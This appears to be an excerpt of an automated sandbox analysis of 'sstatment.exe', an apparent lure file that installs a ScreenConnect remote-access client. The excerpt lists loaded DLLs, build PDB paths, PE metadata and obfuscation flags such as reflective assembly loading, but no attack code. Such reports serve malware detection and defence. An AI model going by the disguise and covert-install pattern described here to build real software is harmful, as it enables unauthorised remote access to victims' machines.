                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: sstatment.exeStatic PE information: certificate valid
                              Source: sstatment.exeStatic file information: File size 5652448 > 1048576
                              Source: sstatment.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: sstatment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: sstatment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: sstatment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800702450.0000000001760000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800903577.00000000017C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: sstatment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1731372444.000000000055D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1715220594.0000000004770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: sstatment.exe, 5e3178.msi.2.dr, MSI3407.tmp.2.dr, 5e3177.rbs.2.dr, 5e3176.msi.2.dr, MSI367A.tmp.2.dr, setup.msi.0.dr, MSI3417.tmp.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: sstatment.exe, 5e3178.msi.2.dr, 5e3176.msi.2.dr, MSI2C46.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: sstatment.exe
                              Source: sstatment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: sstatment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: sstatment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: sstatment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: sstatment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.2.sstatment.exe.5050000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.sstatment.exe.f478f8.4.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: sstatment.exeStatic PE information: real checksum: 0x54fd91 should be: 0x564e09
                              Source: C:\Users\user\Desktop\sstatment.exeCode function: 0_2_02AD6F00 push eax; mov dword ptr [esp], ecx0_2_02AD6F11
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06DD6F78 push esp; iretd 4_3_06DD7170
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_06DD71A1 push esp; iretd 4_3_06DD7170
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_03C04300 push ecx; retn 0003h7_2_03C0430A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_03C04315 push ecx; retn 0003h7_2_03C0431A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_03C03A95 push eax; retn 0003h7_2_03C03A99
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_0535E042 pushad ; ret 7_2_0535E053
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05848F83 push 5F5E6D27h; ret 7_2_05848F18
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_058457AF push es; retn 0003h7_2_0584578A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05848F50 push 5F5E6D27h; ret 7_2_05848EE8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B725818 pushad ; retn 9B71h8_2_00007FFD9B725871
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B722F3C pushfd ; iretd 8_2_00007FFD9B722F3D
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B727D94 push ss; iretd 8_2_00007FFD9B727D95
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70203F push ds; iretd 9_2_00007FFD9B702046

                              Persistence and Installation Behavior

                              barindex
